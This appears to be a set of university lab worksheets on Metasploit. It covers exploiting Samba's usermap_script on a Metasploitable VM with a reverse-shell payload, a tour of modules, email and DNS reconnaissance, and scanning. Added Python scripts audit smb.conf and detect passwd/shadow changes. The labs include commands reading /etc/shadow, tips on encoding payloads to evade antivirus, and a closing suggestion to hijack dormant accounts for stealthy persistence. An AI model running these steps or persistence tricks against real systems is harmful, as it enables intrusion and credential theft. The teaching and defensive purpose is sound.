The attached documents need to be filled out.

Network Attack Lab
Class: SEC6070
Name:
Date:
In this lab we will explore a Metasploit based network share exploitation.
1. If Metasploitable isn’t already running, launch the Metasploitable VM.
2. At the user logon prompt type: msfadmin
3. At the password prompt type: msfadmin
4. Type: ifconfig
5. Record the IP address here:
a. Paste screenshot here:-
6. Now switch to Kali.
7. Open a shell by clicking on the black box next to the word “Places”.
8. Let’s look for network share technologies in use. Type: nmap -A -p 139,445 x.x.x.x (replace
x.x.x.x with the IP of Metasploitable; see step 5.)
We’ve gathered information on the network share technology being used. Now let’s launch
Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing
technology we’ve identified.
9. Launch Metasploit. Type: msfconsole
10. Let’s search Metasploit’s database for samba exploits. Type: search samba
11. Type: use exploit/multi/samba/usermap_script
12. Type: info
a. Paste screenshot here:-
13. Type: set rhost x.x.x.x (replace x.x.x.x with the IP of the Metasploitable VM. See step 5.)
14. Type: set payload cmd/unix/reverse
15. Type: set lhost x.x.x.x (replace x.x.x.x with the IP address of KALI.)
16. Let’s confirm the changes you made took. Type: info
a. Paste screenshot here:-
17. Type: exploit
a. Paste screenshot here:-
18. Type: whoami
a. Paste screenshot here:-
19. Type: pwd
a. Paste screenshot here:-
20. Type: cat /etc/shadow
a. Paste screenshot here:-
21. Type: cat /etc/passwd
a. Paste screenshot here:-
Mission accomplished!
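The module used in step 11 abuses Samba’s “username map script” setting in smb.conf (the option name is from my own knowledge; the lab does not state it). The audit below is an added example, not part of the lab or of Metasploit: it parses an smb.conf and reports every place that option is set, so the setting can be removed or the server updated before ports 139/445 are exposed.

```python
"""Defender's audit for the smb.conf option behind the usermap_script module.
Assumption (my knowledge, not this page): the module abuses the
'username map script' setting, which makes Samba run an external command
for each incoming logon name. The config below is a constructed sample."""
import configparser

# Constructed smb.conf, not copied from any real host.
SMB_CONF_SAMPLE = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   ; legacy mapping hook left in place
   username map script = /etc/samba/scripts/mapusers.sh

[homes]
   comment = Home Directories
   path = /home/%U
   browseable = no
"""
DANGEROUS_OPTION = "username map script"


def parse_smb_conf(text):
    """Parse smb.conf with ConfigParser. Samba permits duplicate keys and
    uses %-macros, so strict mode and interpolation are off; indentation is
    stripped so indented keys are not mistaken for value continuations."""
    parser = configparser.ConfigParser(strict=False, interpolation=None,
                                       delimiters=("=",))
    parser.read_string("\n".join(l.strip() for l in text.splitlines()))
    return parser


def audit_username_map_script(text):
    """Return (section, command) for every 'username map script' found;
    an empty list means the option is not configured anywhere."""
    parser = parse_smb_conf(text)
    return [(s, parser.get(s, DANGEROUS_OPTION)) for s in parser.sections()
            if parser.has_option(s, DANGEROUS_OPTION)]


if __name__ == "__main__":
    for section, command in audit_username_map_script(SMB_CONF_SAMPLE):
        print(f"[{section}] sets '{DANGEROUS_OPTION}' to {command}: remove "
              "the option or update Samba before exposing ports 139/445")
```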
Closing thought: “whoami” returned “root”. You could create an account and set the password, or
you could use the “passwd” command to change the password on an account that hasn’t recently
been used. That way, if the /etc/passwd or /etc/shadow files are examined, no new accounts would
be identified. The possibilities are limited only by your imagination.
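From the defender’s side, both changes the closing thought describes leave traces in exactly those two files: a new account appears in /etc/passwd, and a changed password shows up in /etc/shadow as a different hash and a fresh last-change date. The script below is an added example (not part of the lab) that diffs a baseline snapshot of both files against the current copies; the snapshots are constructed sample data.

```python
"""Detection for what the closing thought describes: new accounts in
/etc/passwd and changed passwords in /etc/shadow, including on dormant
accounts. Added example; the snapshots below are constructed, not real."""
from datetime import date

# Constructed snapshots. passwd: name:x:uid:gid:gecos:home:shell
# shadow: name:hash:lastchange(days since 1970-01-01):min:max:warn:inactive:expire:
PASSWD_BASELINE = """root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
service:x:1001:1001::/home/service:/bin/bash
"""
PASSWD_CURRENT = PASSWD_BASELINE + "support:x:1002:1002::/home/support:/bin/bash\n"
SHADOW_BASELINE = """root:$1$aaaa$hash1:14684:0:99999:7:::
msfadmin:$1$bbbb$hash2:14684:0:99999:7:::
service:$1$cccc$hash3:14684:0:99999:7:::
"""
SHADOW_CURRENT = """root:$1$aaaa$hash1:14684:0:99999:7:::
msfadmin:$1$bbbb$hash2:14684:0:99999:7:::
service:$1$dddd$hash9:20000:0:99999:7:::
support:$1$eeee$hash4:20000:0:99999:7:::
"""


def parse_colon_file(text, field):
    """Map account name -> the chosen field of a colon-separated file."""
    result = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            parts = line.split(":")
            result[parts[0]] = parts[field]
    return result


def days_since_epoch():
    """Today's date in the unit /etc/shadow uses for its last-change field."""
    return (date.today() - date(1970, 1, 1)).days


def audit_accounts(passwd_old, passwd_new, shadow_old, shadow_new,
                   today_days=None, window=30):
    """Return (added accounts, accounts whose hash changed, accounts whose
    password was set within the last `window` days), each sorted."""
    old_names = set(parse_colon_file(passwd_old, 0))
    new_names = set(parse_colon_file(passwd_new, 0))
    old_hash = parse_colon_file(shadow_old, 1)
    new_hash = parse_colon_file(shadow_new, 1)
    last_change = parse_colon_file(shadow_new, 2)
    cutoff = (today_days if today_days is not None else days_since_epoch()) - window
    added = sorted(new_names - old_names)
    changed = sorted(n for n in old_hash if n in new_hash and old_hash[n] != new_hash[n])
    recent = sorted(n for n, d in last_change.items() if d.isdigit() and int(d) >= cutoff)
    return added, changed, recent


if __name__ == "__main__":
    print(audit_accounts(PASSWD_BASELINE, PASSWD_CURRENT, SHADOW_BASELINE,
                         SHADOW_CURRENT, today_days=20003))
```

A password change on a long-idle account shows up in the third list even when no account was added, which is the case the closing thought relies on going unnoticed.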
Once you have completed this worksheet please upload it via the link on Blackboard for grading.

Introduction to Metasploit – A Tour
Class: SEC6070
Name:
Date:
What is Metasploit?
Metasploit is an open source framework for exploitation that has transcended its humble
beginnings and become a “penetration testing environment suite” – my interpretation. I say
this because you are now able to use Metasploit to accomplish any task in the penetration
testing phase and based on your findings you may choose a tool/methodology, modify an
existing tool/methodology, or create a new tool/methodology to accomplish your goal.
While most penetration testing options like Canvas have additional options and features, none
provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful
Linux-based operating system loaded with tools, a pentester has everything he or she needs in
Metasploit. As you will soon learn in this course, Metasploit has reconnaissance tools
(discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit
doesn’t get caught by IPS or antivirus, password attack tools, and many, many more.
PLEASE DON’T CONFUSE METASPLOIT (THE FRAMEWORK) WITH METASPLOITABLE (THE
VULNERABLE BY DESIGN OPERATING SYSTEM)
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Launch a terminal (shell). (It’s the black box icon to the right of Applications, Places.)
3. Type: msfconsole
Wait patiently for Metasploit to load.
a. Once loaded paste your screenshot here:-
4. Open another terminal and type: env
a. Paste your screenshot here: –
(View the PATH variable. When you attempt to execute a program, Linux searches each directory
listed in the PATH environment variable to find and execute the program. That’s why you may type
“msfconsole” without a full path and the program executes.)
5. If you visit the Rapid7 website (https://www.rapid7.com/) you will find you have the option
to register for notifications, support, and updates of Kali.
Rapid7 has moved away from using SVN for code management to Git.
For our purpose, here it doesn’t matter but if you enjoy working on the bleeding edge of distros
you may want to register and upgrade to the latest version.
a. Paste your screenshot here: –
6. Switch your focus back to the Metasploit shell. Look at the information under the banner
and answer the questions below about the various modules available.
6a. How many exploits does Metasploit have:
6b. How many auxiliary exploits does Metasploit have:
6c. How many post modules does Metasploit have:
6d. How many payloads does Metasploit have:
6e. How many encoders does Metasploit have:
6f. How many nops does Metasploit have:
Metasploit Modules Breakdown
I’ve defined Metasploit’s modules below.
Take the time to read them so you have a better understanding of their purpose and use.
Exploits – Pre-packaged malicious executables that take advantage of a vulnerability to gain
access to a system and deliver a payload.
Payloads – Can be a variety of applications/configurations used to establish foothold on system
post-exploitation. Examples are reverse shells that call home or stagers for further exploitation
and persistence. Meterpreter is a particularly useful and commonly used payload shell.
Encoders – Obfuscate exploits and payloads so they can’t be fingerprinted by AV or IDS/IPS
definitions.
Auxiliary – Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers,
and more.
Post – Automation modules for post-exploitation. Tools to further establish access on a system
or network like keystroke loggers and privilege escalators.
NOPs – NOP sled tools such as buffer overflow reference material for custom NOP sleds. For
simplicity’s sake we’ll say NOP sleds tell a processor to do nothing for a specified number of
clock cycles, thereby increasing the chances of your code executing successfully.
With that brief introduction behind us let’s learn by doing.
*You may want to maximize your terminal to full screen.
7. Type: help (Notice the list of commands available to you in Metasploit.)
a. Paste your screenshot here:-
8. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the
results to your terminal.)
a. Paste your screenshot here:-
b. Notice the format: Name, Date, Rank, Description
c. What is the date of the “windows/http/sonicwall_scrutinizer_sqli” exploit?
d. What is its rank?
e. What is its description?
9. Encoders allow you to encode your payload so it doesn’t trigger antivirus or IDS tools like
McAfee’s HBSS.
This is very important to know and understand because most AV and IDS tools aren’t going to
catch your payload if you encode it.
a. Type: show encoders
b. Paste your screenshot here:-
c. Find and document an encoder of your choice here:
10. Payloads are the deliveries we will make to the system we are exploiting.
a. Type: show payloads
b. Paste your screenshot here:-
c. Find and document a payload for the Mac OS here:
d. Paste your screenshot here:-
11. We will use auxiliary modules quite a bit. There are a variety of community provided
penetration testing tools located here.
a. Type: show auxiliary
b. Paste your screenshot here:-
c. Does the auxiliary module contain scanners?
d. If so, list them here:
Now let’s get down to business and pretend we are professional penetration testers
researching a strategy to gain access to an industrial control system network such as a water
treatment plant.
12. We need to find a Windows SCADA exploit.
a. Type every word after this colon: search windows/scada
b. Paste your screenshot here:-
13. Let’s learn more about a particular module we found in our search results to confirm it will
be useful to us.
a. Type: info windows/scada/moxa_mdmtool
b. Who provided this exploit?
c. What are the options available for this exploit?
d. What references are available?
e. What does the description tell us this module does?
14. This may be the exploit we need to compromise the system.
a. Type: use windows/scada/moxa_mdmtool
b. Paste your screenshot here:-
c. Type: show payloads
d. Document two payloads you might use that are available for this exploit:
e. Paste your screenshot here:-
15. Type: show advanced
a. These advanced options, for the most part, won’t normally be changed by you. You will want
to change them in some cases though. Scroll down to the SSL option. It’s currently set to false. If
you were running a reverse shell out of a network you may want to enable SSL, not only to
potentially hide your activity but also to protect your client. The last thing you want to do is
expose the client’s data to a third party because you transferred it in clear text over the
internet.
16. Type: show options
a. Paste your screenshot here:-
b. These are the settings the exploit currently has.
17. Type: info
a. Paste your screenshot here:-
18. Type: help
a. Paste your screenshot here:-
b. What command would you type to verify a system is vulnerable to this exploit?
c. What command would you use to execute the exploit?
19. Type: exit
Now let’s take a look at how Metasploit’s file system is organized.
20. Type: cd /usr/share/metasploit-framework/modules
a. Type: ls (You should recognize the high level organization.)
b. Paste your screenshot here:-
21. Type: cd exploits
a. Type: ls
b. Paste your screenshot here:-
(As you can see, you may drill down into each folder to view the available tools Metasploit offers.
Although this isn’t necessary, it is good to understand how Metasploit is organized for
troubleshooting modules.)
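One way to tally that organization programmatically, which also answers the banner counts asked for in step 6: the script below (an added example, not part of Metasploit or of this lab) walks the modules directory, counts module files per top-level category, and reads Name, Author and DisclosureDate out of each module’s metadata with a plain regex rather than Metasploit’s own loader. When the real modules path is absent it builds a constructed sample tree in a temp directory.

```python
"""Inventory of the modules tree from steps 20-21: module files per
top-level category (the categories the msfconsole banner counts) plus
Name/Author/DisclosureDate from each module's metadata hash. Added example;
a regex over the Ruby source, not Metasploit's loader."""
import os
import re
import tempfile
from collections import Counter

MODULES_DIR = "/usr/share/metasploit-framework/modules"  # path used in the lab

# Constructed stand-in for a module file, not a real Metasploit module.
SAMPLE_MODULE = """  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sample Service Overflow',
      'Author'         => [ 'example author' ],
      'DisclosureDate' => '2012-01-01'))
  end
"""
FIELD_RE = re.compile(r"'(Name|Author|DisclosureDate)'\s*=>\s*(\[.*?\]|'[^']*')", re.S)


def module_metadata(path):
    """Return {field: value} for the metadata fields found in one module file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return {k: v.strip("'[] ") for k, v in FIELD_RE.findall(fh.read())}


def inventory(root):
    """Return (Counter of modules per category, {relative path: metadata})."""
    counts, modules = Counter(), {}
    for dirpath, _, files in os.walk(root):
        category = os.path.relpath(dirpath, root).split(os.sep)[0]  # exploits, post, ...
        for name in files:
            if category != "." and name.endswith((".rb", ".py")):  # Ruby + external modules
                counts[category] += 1
                full = os.path.join(dirpath, name)
                modules[os.path.relpath(full, root)] = module_metadata(full)
    return counts, modules


def build_sample_tree():
    """Create a tiny constructed modules tree in a temp dir for offline runs."""
    root = tempfile.mkdtemp()
    layout = {"exploits/windows/scada": 2, "auxiliary/scanner/portscan": 3, "post/linux": 1}
    for sub, n in layout.items():
        os.makedirs(os.path.join(root, sub))
        for i in range(n):
            with open(os.path.join(root, sub, f"mod{i}.rb"), "w") as fh:
                fh.write(SAMPLE_MODULE)
    return root


if __name__ == "__main__":
    counts, modules = inventory(MODULES_DIR if os.path.isdir(MODULES_DIR) else build_sample_tree())
    print(dict(counts))
```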
You’ve gained a basic understanding of Metasploit’s organization and how to explore this
popular open source penetration testing tool suite. We’ll gain a higher level of understanding
and take part in a more advanced use of Metasploit in subsequent labs.
Please upload this worksheet via the link provided in Blackboard.

Metasploit Reconnaissance Lab
Class: SEC6070
Name:
Date:
In this lab we will be doing information gathering with regards to email addresses within the
wilmu.edu domain.
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop.
3. Type: msfconsole
We’ll start by performing reconnaissance of a potential target.
We’ll run an email reconnaissance module against wilmu.edu for demonstration purposes.
4. Type: use auxiliary/gather/search_email_collector
5. Type: set DOMAIN wilmu.edu
6. Type: set OUTFILE /tmp/results.txt
7. Type: info
a. Paste your screenshot here:-
8. What search engines is search_email_collector using?
a. Paste your screenshot here:-
9. Type: show advanced
a. Paste your screenshot here:-
b. Why might you use a proxy when running search_email_collector?
ANSWER:
10. Type: run
a. Paste your screenshot here:-
11. Your results were already printed to the screen, but what if you move on to another pen testing
activity?
a. Type: cat /tmp/results.txt
b. Paste your screenshot here:-
As you can see, your results have been recorded to a text file for later referencing.
12. Type: ls /usr/share/metasploit-framework/modules/auxiliary/gather
a. Paste your screenshot here:-
13. What other interesting information gather tools are there?
a. List one of the tools you are interested in and why.
ANSWER:
Now that we know a little bit more about wilmu.edu we’ll run a DNS
reconnaissance module against wilmu.edu.
14. Type: back
15. Type: use auxiliary/gather/enum_dns
16. Type: info
a. Paste your screenshot here:-
17. Look at the options that are set to true by default. enum_dns will try a zone transfer using
ENUM_AXFR. enum_dns will also search for common SRV records, such as ftp, http, smtp, ldap,
etc., using ENUM_SRV. ENUM_STD is also set by default. It will search for standard DNS
records such as start of authority (SOA) records, name server (NS) records, and A records (aka hosts). As you
can see, enum_dns is more powerful and aggressive than dns_info.
18. Type: show options
a. Paste your screenshot here:-
19. Type: show advanced
a. Paste your screenshot here:-
b. What options would you use if you had a strategy, such as a low and slow attack that won’t get you
noticed?
ANSWER:
20. Type: set DOMAIN wilmu.edu
21. Type: run
a. Paste your screenshot here:-
22. What information was retrieved?
ANSWER:
23. Let’s explore more enum_dns options.
a. Type: set ENUM_TLD true
24. Type: run (This could take quite a while to complete.)
a. Paste your screenshot here:-
b. How many TLDs does enum_dns search?
ANSWER:
Be careful when using this option. You might find spoofed sites that have been set up to look like the
original and then get hit with exploits suites like the Black Hole Exploit Kit.
25. Type: show options
a. Paste your screenshot here:-
b. What does ENUM_RVL do?
ANSWER:
26. What does ENUM_BRT do?
ANSWER:
a. Type: ls /usr/share/wordlists
b. Paste your screenshot here:-
These are not files you would want to cat or gedit. They are enormous wordlists used by Metasploit for
various brute forcing purposes.
We’ve done some basic but effective reconnaissance using Metasploit. We’ve discovered email
addresses and servers belonging to Wilmington University. There are many reconnaissance tools
available to you such as Maltego. Maltego is a highly effective reconnaissance tool that also searches
social network sites.
Once completed please upload this worksheet to Blackboard by the link provided for grading.

Metasploit Scanning Lab
Class: SEC6070
Name:
Date:
1. If your VMs aren’t already running then open VMware and launch the Kali VM and login as root with
your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the
word “Places”.
3. Type: msfconsole
4. Open another instance of VMware Player and launch the Metasploitable VM.
5. At the user logon prompt type: msfadmin
6. At the password prompt type: msfadmin
7. Type: ifconfig
a. Paste your screenshot here:-
b. This IP address becomes your RHOST (Remote Host)
8. Record the Metasploitable VM IP address here:
Metasploit has numerous scanners located in various places. Let’s become
familiar with how to find and identify the scanners we need. Not all scanners are
built alike. Some are very limited but very good at what they do while others are
broader in functionality and applicable in many instances.
Switch to your Kali VM and type “back” if you currently have a module loaded from
a previous lab.
9. Repeat step 2 and open an additional shell and type:
ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
10. These are just a few of the built in port scanners Metasploit has to offer.
a. What port scanners are available?
b. Paste your screenshot here:-
11. Let’s pick one and list the options and advanced options.
a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas
b. Type: show options
c. Paste your screenshot here:-
d. Type: show advanced
e. Paste your screenshot here:-
12. Type: back
13. Switch to the other shell (Not Metasploit.) and type:
ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery
a. Paste your screenshot here:-
14. Notice we have more discovery tools.
a. List a tool and what it does.
b. Paste your screenshot here:-
15. Switch back to your other shell and type: use auxiliary/scanner/discovery/arp_sweep
a. Type: show options
b. Paste your screenshot here:-
c. Type: show advanced
d. Paste your screenshot here:-
16. Let’s search for more scanners.
a. Type: search type:auxiliary scanner
If you have trouble reading the output make sure your shell is maximized as well as your instance of
VMware.
b. Paste your screenshot here:-
17. What scanner may I use to brute force Outlook Web Access logins?
a. Type: search type:auxiliary outlook
b. Who wrote the module? Type: info
c. Paste your screenshot here:-
d. Type: info auxiliary/scanner/http/owa_login
e. Paste your screenshot here:-
18. What is the pcanywhere_login module good for?
a. Type: search type:auxiliary pcanywhere_login
b. Paste your screenshot here:-
c. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login
d. Paste your screenshot here:-
Now let’s learn how to use the “info” command to gather information about modules.
19. Type: info auxiliary/scanner/mssql/mssql_ping
a. What does this module do?
b. Paste your screenshot here:-
Now let’s look at everyone’s favorite scanner Nmap. Nmap is a tool every pen
tester, system administrator, network administrator, etc, should be familiar with.
*If you currently have a module loaded type: back
20. Type “nmap”. Notice the exhaustive output. The switch syntax is given along with a description of
the command.
21. Type: nmap -sT x.x.x.x (x.x.x.x is the IP address of the Metasploitable VM.)
a. What were some of your findings?
b. Paste your screenshot here:-
Now that we’ve used Nmap to find and scan a host let’s see if we can connect.
22. At the msf console type: connect help
a. Paste your screenshot here:-
View the options.
23. To verify a port is open on your target and you can connect to it type “connect -z x.x.x.x 21”
This will connect you to the FTP port on your target system, if the FTP service is running.
a. Go ahead and see if you are able to connect to the target using the above command. What are the
results?
b. Paste your screenshot here:-
24. Now that you know the FTP port is open you can search for exploits.
a. Type: search platform:linux type:exploit ftp
b. Paste your screenshot here:-
c. List two exploits.
d. Paste your screenshot here:-
We’ve explored scanning with Metasploit by searching for multiple scanner
modules, loading them, and exploring their functions. We also used an industry
favorite, Nmap, to target our victim VM. We connected to an open port to
confirm connectivity and then looked up available exploits in the Metasploit
database. In the labs ahead we’ll be using the information we’ve gathered to
continue looking up exploits and leveraging them against vulnerabilities.